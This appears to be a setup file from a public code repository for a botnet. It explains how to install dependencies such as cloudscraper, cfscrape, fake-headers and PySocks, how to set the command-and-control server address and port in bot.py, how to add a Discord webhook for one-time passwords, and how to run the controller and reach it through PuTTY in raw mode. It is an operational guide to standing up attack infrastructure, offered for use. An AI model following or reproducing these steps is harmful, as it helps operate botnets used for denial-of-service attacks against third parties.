-
Notifications
You must be signed in to change notification settings - Fork 20
/
setup.txt
57 lines (44 loc) · 1.73 KB
/
setup.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
<--+--[ SETUP BOTNET ]--+-->
# EDITION C2 SERVER
(FOLDER) BOTNETc2_offline_user --> FOR OFFLINE USER:PASS (READ FILE USER:PASS IN logins.txt)
(FOLDER) BOTNETc2 --> FOR ONLINE USER:PASS (DOWNLOAD USER:PASS IN MYSQL & READ FILE USER:PASS IN logins.txt)
# install packet #
pip install cryptography
pip install fake_useragent
pip install fake_headers
pip install fake-headers
pip install cfscrape
pip install cloudscraper
pip install requests
pip install ipaddress
pip install discord-webhook
pip install PySocks
# change #
you can change ip and port in bot.py
if you change botnet port pls change port cnc.py too
EXAMPLE CHANGE
bot.py (file)
+-------------------------------+
C2_ADDRESS = "1.1.1.1" <--- change c2 sevrer (if not localhost)
C2_PORT = 8185
+--------------------------------+
c2.py (command)
screen python3 cnc.py 8185
python3 cnc.py 8185
EXAMPLE CONNECT IF YOU CHANGE IP IN bot.py
1.1.1.1 = c2 server ip
127.0.0.1 = localhost ip
192.0.0.1 = other computer ip
127.0.0.1 ---> 1.1.1.1 | bot = show | in ip localhost computer/notebook/vpn
192.0.0.1 ---> 1.1.1.1 | bot = show | not ip localhost computer/notebook/vpn
1.1.1.1 ---> 1.1.1.1 | bot = can't show | because can't connect
# setp next #
vscode/notepad | and next you open in cnc.py and saw this OTP_WEB = "" replace this with OTP_WEB = "link_webhook_discord"
install | and install program putty https://putty.org/ | if you don't have python program https://www.python.org/
cmd | cd (path folder BotC2) & start python cnc.py 8080 & start python bot.py & start putty.exe -raw 127.0.0.1 8080
OPEN PUTTY
GO TO CONNECTION TYPE
CLICK OTHER SET RAW
Type Hostname with you ip server ( cnc ) example 127.0.0.1
and Port it show in console or put 8080
next click Open